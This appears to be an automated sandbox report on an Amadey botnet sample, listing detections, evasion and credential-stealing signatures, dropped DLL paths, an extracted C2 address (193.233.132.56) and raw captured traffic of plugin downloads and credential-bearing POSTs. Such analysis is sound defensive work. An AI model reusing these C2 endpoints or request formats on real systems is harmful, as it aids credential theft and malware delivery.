Windows Analysis Report
MejqsB9tx9.exe

Overview

General Information

Sample name: MejqsB9tx9.exe
renamed because original name is a hash value
Original sample name: ad43eba0492bdca5ab726c8afcef65d1.exe
Analysis ID: 1435286
MD5: ad43eba0492bdca5ab726c8afcef65d1
SHA1: 045a0074dc5fc2f101891355e623210053f5286f
SHA256: ebb310f5714c3d699d2d5d526855695b24960415b28cc562075e6983a9ab686d
Tags: 32exetrojan
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: MejqsB9tx9.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Found malware configuration
Source: rundll32.exe.7936.9.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://193.233.132.56/neh2sXQk0/index.php", "http://193.233.132.56/Pneh2sXQk0/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://193.233.132.56/3 Virustotal: Detection: 12% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1 Virustotal: Detection: 20% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll Virustotal: Detection: 22% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1ws Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1k Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php Virustotal: Detection: 20% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll Virustotal: Detection: 23% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll Virustotal: Detection: 78% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Virustotal: Detection: 57% Perma Link
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Virustotal: Detection: 78% Perma Link
Multi AV Scanner detection for submitted file
Source: MejqsB9tx9.exe Virustotal: Detection: 56% Perma Link
Source: MejqsB9tx9.exe ReversingLabs: Detection: 55%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: MejqsB9tx9.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: MejqsB9tx9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49732 version: TLS 1.0
Source: unknown HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.2:443 -> 192.168.2.6:50230 version: TLS 1.2
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.3.dr, cred64.dll.3.dr
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49711 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.6:49720 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.6:49722 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50234 -> 193.233.132.56:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 193.233.132.56
Source: Malware configuration extractor IPs: 193.233.132.56
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 02 May 2024 11:07:07 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 02 May 2024 11:07:10 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1714648324489Host: self.events.data.microsoft.comContent-Length: 7996Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 41 41 45 34 31 43 38 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CEFAAE41C8FCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 41 41 45 34 31 43 38 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CEFAAE41C8FCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 41 41 45 34 31 43 38 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CEFAAE41C8FCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 41 41 45 34 31 43 38 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CEFAAE41C8FCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 41 41 45 34 31 43 38 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CEFAAE41C8FCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 41 41 45 34 31 43 38 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CEFAAE41C8FCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 41 41 45 34 31 43 38 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CEFAAE41C8FCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
